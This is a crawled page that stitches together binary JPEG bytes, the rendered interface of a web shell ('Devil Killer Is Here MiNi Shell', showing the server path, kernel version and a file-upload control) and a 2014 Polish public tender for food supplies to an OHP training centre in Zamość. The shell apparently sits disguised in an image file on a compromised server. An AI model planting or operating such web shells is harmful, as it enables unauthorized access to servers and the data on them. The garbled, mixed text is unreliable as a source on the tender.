JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140402/111946-N-2014.html

<p class="kh_header"><b>Lublin: Dostawa artykułów żywnościowych do Ośrodka Szkolenia i Wychowania w Zamościu</b><br>
<b>Numer ogłoszenia: 111946 - 2014; data zamieszczenia: 02.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Lubelska Wojewódzka Komenda , ul. Wojciechowska 7, 20-704 Lublin, woj. lubelskie, tel. 081 5245108/09 w.13, faks 081 5245108/09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubelska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OCHOTNICZE HUFCE PRACY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Ośrodka Szkolenia i Wychowania w Zamościu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.1. Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Ośrodka Szkolenia i Wychowania w Zamościu, mieszczącego się przy ul. Kilińskiego 86a, 22 400 Zamość.
Oferowane artykuły żywnościowe muszą być dopuszczone do obrotu oraz posiadać dobrą jakość. Produkty te powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w zbiorowym żywieniu. 
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.
Dostawy będą wykonywane do wyczerpania środków Zamawiającego na ten przedmiot zamówienia.
Zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych a wszelkie składniki przedmiotu zamówienia określone za pomocą  nazw producenta, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostarczane artykuły, aby spełniać opisane poniżej wymagania zamówienia.
3.1.2. MIEJSCE DOSTAWY Ośrodek Szkolenia i Wychowania w Zamościu, ul. Kilińskiego 86a, 22 400 Zamość.
3.1.3. SPOSÓB DOSTAWY dostawy będą następować cyklicznie stosownie do potrzeb Zamawiającego od dnia podpisania umowy do 31 grudnia 2014 roku, po uprzednim telefonicznym ustaleniu, z wyprzedzeniem jednodniowym przez Zamawiającego wielkości 
i terminu dostawy. Wykonawca realizuje zamówienie zgodnie z wymogami Zamawiającego, dzień dostawy zawsze wyznaczany jest przez osobę odpowiedzialną za zamówienia artykułów żywnościowych w jednostce organizacyjne LWK OHP. Wykonawca bezwzględnie musi stosować się do potrzeb i wymogów Zamawiającego.
Osoba odpowiedzialna za dostawy: Katarzyna Garbata, tel. 084 63914 07.
3.1.4. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części: 
Część 1	ryby przetworzone i konserwowane,
Część 2	owoce, warzywa i podobne produkty,
Część 3	oleje i tłuszcze zwierzęce lub roślinne,
Część 4	produkty mleczarskie,
Część 5	produkty przemiału ziarna, skrobi i produktów skrobiowych,
Część 6	różne produkty spożywcze - pozostałe,
Część 7	napoje bezalkoholowe,
Część 8	produkty zwierzęce, mięso i produkty mięsne,
Część 9	pieczywo, świeże wyroby piekarskie i ciastkarskie,
Część 10	świeży drób,
Część 11	produkty mrożone..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.98.00.00-1, 15.10.00.00-9, 15.81.00.00-9, 15.11.21.00-7, 15.33.11.70-9, 15.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części: 1, 4, 8 i 10
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,
dla części: 2, 3, 5, 6, 7 i 9:
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania (a jeśli okres prowadzenia działalności jest krótszy w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,
dla części 11
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części: 1, 4, 8 i 10
5.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
dysponowanie sprawnym pod względem technicznym samochodem, z działającą prawidłowo zabudową izotermiczną lub chłodnią, 

dla części 11
5.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
dysponowanie sprawnym pod względem technicznym samochodem, z działającą prawidłowo mroźnią.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem ust. 2
2.     Strony przewidują możliwość wprowadzenia następujących zmian w umowie: 
1 zmiana stawki i kwoty podatku Vat.
2 zmiana terminu realizacji przedmiotu zamówienia, w przypadku
a działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubelska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Wojciechowska 7, 20-704 Lublin, pok. 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2014 godzina 10:00, miejsce: ul. Wojciechowska 7, 20-704 Lublin, pok. 216.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ryby przetworzone i konserwowane,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płaty śledziowe z mintaja solone
Konserwa rybna  w oleju  170 g
warzywa na patelnię  mrożone450 g
hamburgery rybna panierowane 2000g
 delfinki, rybki rybne panierowane 2000g
Konserwa rybna  w pomidorach  170 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce, warzywa i podobne produkty,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapusta kwaszona biała
Ogórek kiszony
Ogórek małosolny
Banany 
Burak czerwony
Cebula
Cytryna
Fasola szparagowa
Jabłka szampion
Kalafior
Kapusta biała
Kapusta biała młoda
Kapusta czerwona
Kapusta pekińska
Kiwi
Koperek zielony pęczek
Mandarynka
Marchew
Natka pietruszki pęczek
Brzoskwinia
Ogórek świeży
Papryka świeża
Pieczarki
Pietruszka korzeń
Pomarańcze
Pomidor kl. I
Por
Rzodkiewka pęczek
Sałata masłowa
Seler 
Soczewica 
Szczypior pęczek
Truskawka
Ziemniaki średnio późne i późne bryza
Brokuł
Czosnek
Śliwka
Winogrona
Jajka M
Sałata lodowa
dynia
cukinia
borowik  suszony
maliny
Czarne jagody
borówka 
jabłka szara reneta
jabłka mekintosz
Ziemniaki wczesne i bardzo wczesne aster
jabłka  gloster.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> oleje i tłuszcze zwierzęce lub roślinne,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej roślinny 1 l
Smalec 200 g
masło extra 200 g
Margaryna 250 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> produkty mleczarskie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt  150g truskawka, jagoda, banan, wanilia Krasnystaw lub równoważny
Kefir 330 g
śmietana 22 % 500g Krasnystaw lub równoważny
Śmietana 22% 250g Piątnica lub równoważny
Mleko 2 %
Śmietana 18 % 400 ml
Śmietana 12 % 1000 ml
Ser żółty  gołda blok
Twaróg półtłusty 
Serek twarogowy 370 g
Ser topiony  krążek 8 szt. w opakowaniu typu lactima 
Serek homogenizowany 150 g wanilia, czekolada, truskawka, brzoskwinia typu Krasnystaw lub równoważny
ser typu feta 180g
ser typu mozarella 200 g
serek do chleba typu Bieluch lub równoważny 
serek wiejski 200g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> produkty przemiału ziarna, skrobi i produktów skrobiowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kasza manna
Kasza gryczana 
Mąka pszenna 450
Mąka ziemniaczana
Ryż długoziarnisty
Ryż saszetki 400 g typu basmati
Kasza jęczmienna 
Kasza kuskus
fasola Jaś 500g
groch połówki 500g
Kasza jęczmienna typu pęczak.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> różne produkty spożywcze pozostałe,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 0,5 kg
Baton czekoladowy typu Pawełek lub równoważny
Budyń w proszku 40g
Cukier kryształ
Cukier wanilinowy 25 g
Czekolada 10x 25 g do picia w saszetkach Lafesta lub równoważna
Deserki typu MONTE 55 g lub równoważny
Galaretka w proszku smak agrest, wiśnia, truskawka, cytryna, 90g
oliwki konserwowe 1l
Herbata 90 g granulowana Saga lub równoważna
Herbata EKOLAND 300 g lub równoważna
Herbata ekspresowa 100 szt. Lipton lub równoważna
orzechy włoskie 100 g
Orzechy laskowe 100 g
Wiórki kokos 100 g
Kakao 200 g Dkomorreno extra ciemne lub równoważne
Kawa zbożowa 150 g typu Inka 
Ketchup 500 g Pudliszki łagodny lub równoważny
Ketchup 500 g Pudliszki pikantny lub równoważny
Liść laurowy 100g
krem czekoladowy 200g Nutella lub równoważny
Krem o smaku czekoladowo  orzechowym Gumiś 200g lub równoważny
Kisiel 40 g, pomarańcz, wiśnia, truskawka, malins
sałatki warzywne w słoiku 900 ml
konserwa gulasz 300g
Konserwa Luncheon meat 300 g
Majonez 700 g typu Winiary lub równoważny
Majonez wiaderko Winiary 3 kg lub równoważny
Makaron 500 g typu Lubella nitki cinte lub równoważny
Makaron 500 g typu Lubella  świderki lub równoważny
Makaron 500 g typu Lubella spagetti lub równoważny
Makaron 500 g typu Lubella muszelki lub równoważny
Makaron 500 g typu Lubella lasagne lub równoważny
Makaron ryżowy Divella 500 g lub równoważny
Marmolada 0,9 l wieloowocowa
Miód pszczeli 220 g
Musztarda sarepska 180 g
Majeranek 20 g
Napój koncentrat 0,5 l
Ocet 0,5 l, 10%
Pasztet podlaski 195 g
Pasztet mazowiecki 460 g
Pieprz mielony 20 g
Przyprawa do zup w płynie typu maggi 960 ml lub równoważny
Przyprawa typu kucharek 1000g lug równoważna
Przyprawa do bigosu  20 g prymat lub równoważna
Przyprawa do mięs 20 g prymat lub równoważna
Przyprawa do ryb 20 g prymat lub równoważna
Cynamon  20 g prymat lub równoważna
kwasek cytrynowy 20 g  prymat lub równoważna
czosnek granulowany 20 g  prymat lub równoważna
krem do tortów 350 g czekolada, ajerkoniak, wanilia Delekta lub równoważny
Rosół w kostce 12 kostek typu kucharek lub równoważny
Sos chrzanowy, czosnkowy, inne 250 ml
Sosy w proszku różne 64 g Prymat lub równoważny
Sól kuchenna
Syrop owocowy 5 l, malina, wiśnia, pomarańcza
ciasta błyskawiczne  500g typu dr. Oetker lub równoważne
koper suszony i natka suszona 10g Prymat lub równoważny
Zupa chińska błyskawiczna 64g 
Barszcz biały w proszku 40g 
Zupa ogonowa w proszku 50g
Zupa pieczarkowa w proszku 40g
Barszcz czerwony w proszku 40g
Zupa gulaszowa w proszku 50g
fasola konserwowa czerwona, biała w puszce 400g
Cukier puder 400 g
Kawa mielona tchibo 250 g lub równoważna
Kawa rozpuszczalna Nescafe  200g lub równoważna
Drożdże piekarskie 100g
sos ogrodowy 1000g  Knorr lub równoważny
ciastka kruche 2000g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> napoje bezalkoholowe,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineralna niegazowana 0,5l
Woda mineralna gazowana 0,5 l
Woda mineralna niegazowana 1 l
Woda mineralna gazowana 1 l
napój coca cola 2,5l lub równoważny
napój sprite 2,5 l lub równoważny
oranżada 1,5 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bok surowy łuskany
Bok surowy wieprzowy
Karkówka bez kości
golonka wp
Nogi wieprzowe
Płuca wieprzowe
Schab bez kości
Słonina
Szynka wieprzowa bez kości
Udziec wołowy bez kości
Wątroba wieprzowa
Wieprzowina kl. II
Wołowina kl. II
Żeberka paski
ogony wieprzowe
wątróbka wieprzowa
WĘDLINA
Baleron wędzony gotowany
Bok grilowy
Bok pieczony
Bok wędzony
Golonka prasowana
Karkówka grilowa
Karkówka pieczona
Kaszanka
Kebabki
Kiełbasa biała
Kiełbasa jałowcowa
Kiełbasa krakowska
Kiełbasa parówkowa
Kiełbasa piwna
Kiełbasa zwyczajna
Kiełbasa golonkowa
Kiełbasa podwawelska
Kiełbasa swojska
Kiełbasa szynkowa
Kiełbasa żywiecka
Kiełbasa grillowa
Kiełbaski firmowe
Łopatka myśliwska
Mortadela
Mielonka tyrolska
Ogonówka
Pasztet mięsny 
Pasztet drobiowy
Parówki hot dog
Pasztetowa
Pieczeń węgierska
Luncheon meat
kiełbasa myśliwska
Pierś wędzona z indyka
Polędwica drobiowa
Polędwica sopocka
Rolada schabowa
Szynka konserwowa
Salceson włoski
Schab pieczony
Szynka wędzona
parówki hot dog z serem
pieczeń rzymska
pierś miodowa
pierś wędzona
kiełbasa podwawelska
polędwica łososiowa
salami domowe
schab w majeranku
schab cygański
schab benedykta
schab z beczki
szynka biała
szynka gotowana
szynka swojska 
kiełbasa toruńska
wędzonka krotoszyńska
żywiecka sucha.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pieczywo, świeże wyroby piekarskie i ciastkarskie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka  50 g
Chleb 0,5 kg
Bagietka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> świeży drób,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurczak świeży
Noga z kurczaka świeża
podudzie z kurczaka
Porcja rosołowa świeża
Filet z kurczaka świeży
Korpus drobiowy świeży
Skrzydło drobiowe świeże
Filet z indyka świeży
golonka z indyka
wątróbka dr
kura rosołowa
kaczka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
